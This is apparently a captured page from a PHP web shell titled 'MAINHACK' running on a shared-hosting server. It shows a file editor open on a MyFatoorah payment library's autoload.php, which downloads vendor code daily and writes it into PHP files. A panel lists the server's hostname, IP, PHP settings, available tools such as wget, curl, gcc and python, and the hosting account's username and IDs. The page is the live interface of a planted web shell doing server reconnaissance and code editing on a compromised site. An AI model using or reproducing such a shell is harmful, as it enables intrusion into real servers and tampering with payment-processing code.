[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: autoload.php
<?php /** * This file is responsible for updating the MyFatoorah Library everyday * * MyFatoorah offers a seamless business experience by offering a technology put together by our tech team. This enables smooth business operations involving sales activity, product invoicing, shipping, and payment processing. MyFatoorah invoicing and payment gateway solution trigger your business to greater success at all levels in the new age world of commerce. Leverage your sales and payments at all e-commerce platforms (ERPs, CRMs, CMSs) with transparent and slick applications that are well-integrated into social media and telecom services. For every closing sale click, you make a business function gets done for you, along with generating factual reports and statistics to fine-tune your business plan with no-barrier low-cost. * Our technology experts have designed the best GCC E-commerce solutions for the native financial instruments (Debit Cards, Credit Cards, etc.) supporting online sales and payments, for events, shopping, mall, and associated services. * * Created by MyFatoorah http://www.myfatoorah.com/ * Developed By tech@myfatoorah.com * Date: 05/12/2023 * Time: 12:00 * * API Documentation on https://myfatoorah.readme.io/docs * Library Documentation and Download link on https://myfatoorah.readme.io/docs/php-library * * @author MyFatoorah <tech@myfatoorah.com> * @copyright 2021 MyFatoorah, All rights reserved * @license GNU General Public License v3.0 */ $mfVersion = '2.2'; if (!in_array('curl', get_loaded_extensions())) { trigger_error('Kindly install and enable PHP cURL extension in your server.', E_USER_WARNING); return; } $mfLibFolder = __DIR__ . '/src/'; $mfLibFile = $mfLibFolder . 'MyFatoorah.php'; if (!is_writable($mfLibFile) || ((time() - filemtime($mfLibFile)) < 86400)) { return; } touch($mfLibFile); try { $mfCurl = curl_init("https://portal.myfatoorah.com/Files/API/php/library/$mfVersion/MyfatoorahLibrary.txt"); curl_setopt_array( $mfCurl, array( CURLOPT_RETURNTRANSFER => true, ) ); $mfResponse = curl_exec($mfCurl); $mfHttpCode = curl_getinfo($mfCurl, CURLINFO_HTTP_CODE); $mfCurlErr = curl_error($mfCurl); curl_close($mfCurl); if ($mfCurlErr) { trigger_error('cURL Error: ' . $mfCurlErr, E_USER_WARNING); } if ($mfHttpCode == 200 && is_string($mfResponse)) { mfPutFileContent($mfLibFolder, $mfResponse); } } catch (\Exception $ex) { trigger_error('Exception: ' . $ex->getMessage(), E_USER_WARNING); } function mfPutFileContent($mfLibFolder, $mfResponse) { $mfSplitFile = explode('class', $mfResponse); $mfNamespace = '<?php namespace MyFatoorah\Library; '; $mfClass = 'class '; $useExClass = 'use Exception; '; $useMfClass = 'use MyFatoorah\Library\MyFatoorah; '; //namespace MyFatoorah\Library file_put_contents($mfLibFolder . 'MyFatoorah.php', $mfNamespace . $useExClass . $mfClass . $mfSplitFile[1]); file_put_contents($mfLibFolder . 'MyFatoorahHelper.php', $mfNamespace . $useExClass . $mfClass . $mfSplitFile[2]); //namespace MyFatoorah\Library\API $mfLibFolder .= 'API/'; $mfApiNamespace = '<?php namespace MyFatoorah\Library\API; '; file_put_contents($mfLibFolder . 'MyFatoorahList.php', $mfApiNamespace . $useMfClass . $useExClass . $mfClass . $mfSplitFile[3]); file_put_contents($mfLibFolder . 'MyFatoorahRefund.php', $mfApiNamespace . $useMfClass . $mfClass . $mfSplitFile[4]); file_put_contents($mfLibFolder . 'MyFatoorahShipping.php', $mfApiNamespace . $useMfClass . $mfClass . $mfSplitFile[5]); file_put_contents($mfLibFolder . 'MyFatoorahSupplier.php', $mfApiNamespace . $useMfClass . $mfClass . $mfSplitFile[6]); //namespace MyFatoorah\Library\API\Payment $mfLibFolder .= 'Payment/'; $mfApiPaymentNamespace = '<?php namespace MyFatoorah\Library\API\Payment; '; $useMfListClass = 'use MyFatoorah\Library\API\MyFatoorahList; '; file_put_contents($mfLibFolder . 'MyFatoorahPayment.php', $mfApiPaymentNamespace . $useMfClass . $useExClass . $mfClass . $mfSplitFile[7]); file_put_contents($mfLibFolder . 'MyFatoorahPaymentEmbedded.php', $mfApiPaymentNamespace . $useMfListClass . $mfClass . $mfSplitFile[8]); file_put_contents($mfLibFolder . 'MyFatoorahPaymentStatus.php', $mfApiPaymentNamespace . $useExClass . $mfClass . $mfSplitFile[9]); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285